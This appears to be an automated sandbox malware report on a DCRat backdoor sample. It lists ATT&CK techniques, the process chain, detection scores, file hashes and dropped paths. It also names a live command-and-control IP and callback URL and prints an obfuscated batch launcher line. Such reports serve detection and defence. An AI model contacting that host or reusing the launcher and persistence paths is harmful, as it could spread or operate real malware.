                          | Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | Login Hook | Login Hook | 1 Software Packing | NTDS | 361 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
                          | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                          | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 333 Masquerading | Cached Domain Credentials | 261 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                          | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 261 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                          | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                          | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                          [Behavior graph. ID: 1583613, Sample: updIMdPUj8.exe, Startdate: 03/01/2025, Architecture: WINDOWS, Score: 100. Process chain shown: updIMdPUj8.exe -> wscript.exe -> cmd.exe -> hypersurrogateComponentdhcp.exe -> cmd.exe -> ZWgKQlTqcrSB.exe, which contacts 86.110.194.28 (RACKTECHRU, Russian Federation).]

                          | Source | Detection | Scanner | Label |
                          |---|---|---|---|
                          | updIMdPUj8.exe | 58% | Virustotal | |
                          | updIMdPUj8.exe | 68% | ReversingLabs | Win32.Trojan.Uztuby |
                          | updIMdPUj8.exe | 100% | Avira | VBS/Runner.VPG |
                          | updIMdPUj8.exe | 100% | Joe Sandbox ML | |

                          | Source | Detection | Scanner | Label |
                          |---|---|---|---|
                          | C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat | 100% | Avira | BAT/Delbat.C |
                          | C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe | 100% | Avira | HEUR/AGEN.1309961 |
                          | C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe | 100% | Avira | VBS/Runner.VPG |
                          | C:\Recovery\csrss.exe | 100% | Avira | HEUR/AGEN.1309961 |
                          | C:\Users\user\Desktop\KCawqqLw.log | 100% | Avira | TR/AVI.Agent.updqb |
                          | C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe | 100% | Avira | HEUR/AGEN.1309961 |
                          | C:\Users\user\Desktop\IwSFjKJP.log | 100% | Avira | HEUR/AGEN.1300079 |
                          | C:\Users\user\Desktop\EOLhHxkb.log | 100% | Joe Sandbox ML | |
                          | C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe | 100% | Joe Sandbox ML | |
                          | C:\Users\user\Desktop\DWtPcxKJ.log | 100% | Joe Sandbox ML | |
                          | C:\Users\user\Desktop\ATGgGOGO.log | 100% | Joe Sandbox ML | |
                          | C:\Recovery\csrss.exe | 100% | Joe Sandbox ML | |
                          | C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe | 100% | Joe Sandbox ML | |
                          | C:\Users\user\Desktop\IwSFjKJP.log | 100% | Joe Sandbox ML | |
                          | C:\Users\user\Desktop\GUTYNdlI.log | 100% | Joe Sandbox ML | |
                          | C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          | C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          | C:\Program Files\Adobe\ZWgKQlTqcrSB.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          | C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          | C:\Recovery\csrss.exe | 78% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                          | C:\Users\user\Desktop\AQlYVRJc.log | 8% | ReversingLabs | |
                          | C:\Users\user\Desktop\ATGgGOGO.log | 8% | ReversingLabs | |
                          | C:\Users\user\Desktop\DWtPcxKJ.log | 5% | ReversingLabs | |
                          | C:\Users\user\Desktop\EOLhHxkb.log | 8% | ReversingLabs | |
                          | C:\Users\user\Desktop\EXjhrjDY.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                          | C:\Users\user\Desktop\GQyPcgoW.log | 25% | ReversingLabs | |
                          | C:\Users\user\Desktop\GUTYNdlI.log | 16% | ReversingLabs | |
                          | C:\Users\user\Desktop\HNZYygDR.log | 8% | ReversingLabs | |
                          | C:\Users\user\Desktop\HRugjdAD.log | 3% | ReversingLabs | |
                          | C:\Users\user\Desktop\IECYOtkU.log | 25% | ReversingLabs | |
                          | C:\Users\user\Desktop\IwSFjKJP.log | 17% | ReversingLabs | |
                          | C:\Users\user\Desktop\KCawqqLw.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                          | C:\Users\user\Desktop\KUhOFMFy.log | 8% | ReversingLabs | |
                          | C:\Users\user\Desktop\MBrWacSF.log | 17% | ReversingLabs | |
                          | C:\Users\user\Desktop\MJbpFLtL.log | 21% | ReversingLabs | |
                          | C:\Users\user\Desktop\NKXFMJFr.log | 25% | ReversingLabs | |
                          | C:\Users\user\Desktop\OxfxrZpJ.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                          | C:\Users\user\Desktop\PHyNhJUm.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          | C:\Users\user\Desktop\PybNxWBp.log | 25% | ReversingLabs | |
                          | C:\Users\user\Desktop\QvCVTWQk.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                          | C:\Users\user\Desktop\RfmVTnPw.log | 3% | ReversingLabs | |
                          | C:\Users\user\Desktop\TkxwTWEx.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                          | C:\Users\user\Desktop\TuQMKFja.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                          | C:\Users\user\Desktop\XXPuwSTl.log | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                          C:\Users\user\Desktop\XpVNKoNn.log29%ReversingLabs
                          C:\Users\user\Desktop\YqSdRlZU.log8%ReversingLabs
                          C:\Users\user\Desktop\aeWlDzVS.log9%ReversingLabs
                          C:\Users\user\Desktop\cPBBKMgL.log12%ReversingLabs
                          C:\Users\user\Desktop\cXlUovHQ.log21%ReversingLabs
                          C:\Users\user\Desktop\dBJtpdQc.log21%ReversingLabs
                          C:\Users\user\Desktop\ddkcuipI.log17%ReversingLabs
                          C:\Users\user\Desktop\eRokfvkG.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\fEwcKMUX.log12%ReversingLabs
                          C:\Users\user\Desktop\gBXkgMjS.log9%ReversingLabs
                          C:\Users\user\Desktop\gSeCuhdU.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\hbKlfOQH.log9%ReversingLabs
                          C:\Users\user\Desktop\kJRJIbpu.log21%ReversingLabs
                          C:\Users\user\Desktop\kOfTBNTO.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\kSAcnKQA.log25%ReversingLabs
                          C:\Users\user\Desktop\krNbnIjL.log9%ReversingLabs
                          C:\Users\user\Desktop\nzLkJbeH.log5%ReversingLabs
                          C:\Users\user\Desktop\oROSeukq.log29%ReversingLabs
                          C:\Users\user\Desktop\tahrXlpt.log25%ReversingLabs
                          C:\Users\user\Desktop\xAiiOWpY.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\yViIeRfn.log16%ReversingLabs
                          C:\Users\user\Desktop\yeGIODyj.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\zgCYVAKQ.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\zomqzklW.log17%ReversingLabs
                          C:\Windows\TAPI\ZWgKQlTqcrSB.exe78%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          No Antivirus matches
                          No Antivirus matches
                          Source | Detection | Scanner | Label | Link
                          No contacted domains info
                          Name | Malicious | Antivirus Detection | Reputation
                          http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.phptrue
                          • Avira URL Cloud: safe
                          unknown
                          Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                  https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000001A.00000003.2063367474.000001D5AB332000.00000004.00000800.00020000.00000000.sdmp, edb.log.26.drfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.2023418258.000001FDA8C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483449000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590AA78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67FC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.jiyu-kobo.co.jp/ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.fontbureau.com/designers8ZWgKQlTqcrSB.exe, 00000018.00000002.3066374114.000000001F762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://aka.ms/pscore68powershell.exe, 00000007.00000002.2023418258.000001FDA8A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2012310571.0000015483221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2018884103.000002199CAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2017450916.000002590A851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2029361169.000001BD67DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.orgUJ59LdJnt9.24.drfalse
                                                                                                                                              high
                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013044000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FFE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A64000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AAA000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131A2000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001315C000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139D8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000014689000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FB8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AF0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131E8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001308A000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013116000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A1E000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013312000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 
00000018.00000002.2988187631.0000000013358000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drfalse
                                                                                                                                                high
                                                                                                                                                http://86.110.Hx;ZWgKQlTqcrSB.exe, 00000018.00000002.2935880086.0000000003320000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://crl.microspowershell.exe, 00000007.00000002.2748232345.000001FDC0C60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
86.110.194.28 | unknown | Russian Federation | 208861 | RACKTECHRU | true
IP
127.0.0.1
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1583613
                                                                                                                                                    Start date and time:2025-01-03 07:56:09 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 10m 15s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes:28
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:updIMdPUj8.exe
                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                    Original Sample Name:bc1fb66921db74a0051917b26a4bd316.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.expl.evad.winEXE@35/375@0/2
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 37.5%
                                                                                                                                                    HCA Information:Failed
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.56.254.164, 52.149.20.212, 13.107.246.45
                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7804 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7812 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7828 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7852 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:57:27 | API Interceptor | 150x Sleep call for process: powershell.exe modified
01:57:40 | API Interceptor | 211103x Sleep call for process: ZWgKQlTqcrSB.exe modified
01:57:43 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                                                                                                                    No context
                                                                                                                                                    No context
Match: RACKTECHRU
Associated Sample Name / URL | Detection | Threat Name | Context
jew.sh4.elf | malicious | Unknown | 91.223.144.119
la.bot.mipsel.elf | malicious | Unknown | 193.38.236.134
oyCvLcfl3R.exe | malicious | XenoRAT | 194.113.106.81
qsKo.ps1 | malicious | RHADAMANTHYS | 194.113.106.180
GsrDwm0DJG.ps1 | malicious | RHADAMANTHYS | 194.113.106.180
HeggBkMoYE.ps1 | malicious | RHADAMANTHYS | 194.113.106.180
b2J6hgvd51.elf | malicious | Unknown | 45.128.232.191
TbFoReHi2v.elf | malicious | Mirai | 45.128.232.235
gmA11dfzc2.elf | malicious | Mirai | 45.128.232.235
naoen3DFXE.elf | malicious | Mirai | 45.128.232.235
                                                                                                                                                    No context
Match: C:\Users\user\Desktop\AQlYVRJc.log
Associated Sample Name / URL | Detection | Threat Name
f3I38kv.exe | malicious | DCRat, PureLog Stealer, zgRAT
r6cRyCpdfS.exe | malicious | DCRat, PureLog Stealer, zgRAT
Z4D3XAZ2jB.exe | malicious | DCRat, PureLog Stealer, zgRAT
cbCjTbodwa.exe | malicious | DCRat, PureLog Stealer, zgRAT
vb8DOBZQ4X.exe | malicious | DCRat, PureLog Stealer, zgRAT
6G8OR42xrB.exe | malicious | DCRat, PureLog Stealer, zgRAT
XNPOazHpXF.exe | malicious | DCRat, PureLog Stealer, zgRAT
9FwQYJSj4N.exe | malicious | DCRat, PureLog Stealer, zgRAT
150bIjWiGH.exe | malicious | DCRat, PureLog Stealer, zgRAT
wmdqEYgW2i.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                                                                                                                        Process:C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):109
                                                                                                                                                                        Entropy (8bit):5.292863224313856
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:wsWrGN9TUagBTErQKaNcqKxAmy1L4c9n2w3i:txUjvLNcq1qgnX3i
                                                                                                                                                                        MD5:D668E447B3CFC8C4398EC091A033710B
                                                                                                                                                                        SHA1:D8691101D9A35C3D993B8CF40134A8D2AA009114
                                                                                                                                                                        SHA-256:2F2F1026E1514FCC6ACE594FABAD973B43C83C709493CEA8F0E19F829E31AC00
                                                                                                                                                                        SHA-512:C9F3AB19E056902835C06B3D0B2187CEC0203D76DE888B010B10A8F53949B2250E2522CAC878946191268212BECE715C39D9E74AA62F8C93881F0E772BA0A014
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:%HHfloO%%SskCHhHcUut%..%MBjOGfVEwqUJzS%"C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"%XOaqabWIcSURX%
                                                                                                                                                                        Process:C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Process:C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):228
                                                                                                                                                                        Entropy (8bit):5.871879918776451
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:GJ2wqK+NkLzWbHBUrFnBaORbM5nCkh4KH+3rj2ttL9:GZMCzWL+hBaORbQCc4nHY7
                                                                                                                                                                        MD5:874EF46FE42F511DE26FE5EC8980F5FE
                                                                                                                                                                        SHA1:65237AA9425BFACD4E1846FE0BE657F0EFD4F13C
                                                                                                                                                                        SHA-256:E216400C98C15EE36C181C89021F37738309EF34D06352B638535C7A08F66F95
                                                                                                                                                                        SHA-512:AC2C80406C6376014AB1237D3F0996B166535136D082A8CA27B529BE8C5177BC6F9AB86CB3B866728076269383534B7475D508373AF67ED2856D408AB8950979
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Yara Hits:
                                                                                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\ZWgKQlTqcrSB.exe, Author: Joe Security
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (984), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):984
                                                                                                                                                                        Entropy (8bit):5.897375865340708
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:9NGCwQQ9eGNDzTXwREaRuodW4WAC8IF3vtV/Se+rAUfVNP4Vq426olG6AAyy8Ml4:mQw7DzTARDAAO+EvHSepUfVOQnO3MQ5
                                                                                                                                                                        MD5:35D4587B22AC2E4AC8A2B691EB260AF6
                                                                                                                                                                        SHA1:E1C66E4C02DA7A3D489FAA47B49B50693295C324
                                                                                                                                                                        SHA-256:14A01220F3A0E2E598910BFA079EC76957DA5F3F9E2A3DF9F8FA1C91223DB27C
                                                                                                                                                                        SHA-512:0BB1453F325EB1619212A8DE90D833C040CF646DC6CCB8569D260EB67F9425682E1A4BD43D79D1FAA96B71E78BF076337367209747CE1C43468174E0A7A67D02
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
                                                                                                                                                                        SHA-512:009B86BD2684B3CEE328F3A0869ABCF3D16F4812E5D74D1A11664A490A22C51C5C5DEAF9561CCD50618111C57173435A7ADBBE6EADFE6AFFEEA50D63C1AD3227
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73
                                                                                                                                                                        Entropy (8bit):5.446473017695219
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Ij8NGp8RfDisnRIX+SyDy8:Ij8NNirX+SyDy8
                                                                                                                                                                        MD5:061E8FC04C6EE74A77E72F9FE04633D1
                                                                                                                                                                        SHA1:07075DFA7DE903C3830FA88EB06A3C9E1326424E
                                                                                                                                                                        SHA-256:74B58DF3C842233597F81301E2475B3BE92629A8A884A984AF0C02D462952CF2
                                                                                                                                                                        SHA-512:89A1D465ADB2494C73E8C9CC5FEC5483918CECF1BFB0BC9352281AB1270BCE27DDCC908AFF65CFE9874827E616A52EFA9914B262961086885956F0B86D391D87
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2615296
                                                                                                                                                                        Entropy (8bit):4.63674531088187
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:KTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFnNtINz6t1:4cFcWPnyMcQmQmqycMxFNyN
                                                                                                                                                                        MD5:8A121B557A98B065A7CD2EB30882362D
                                                                                                                                                                        SHA1:87D030319ECAB583FB3B68F152C10D780A4BA757
                                                                                                                                                                        SHA-256:EE08091F6FBCA8BFF62F6C75CE5BB74CF86BDF8ACF80D2497C399F01FCBDE59D
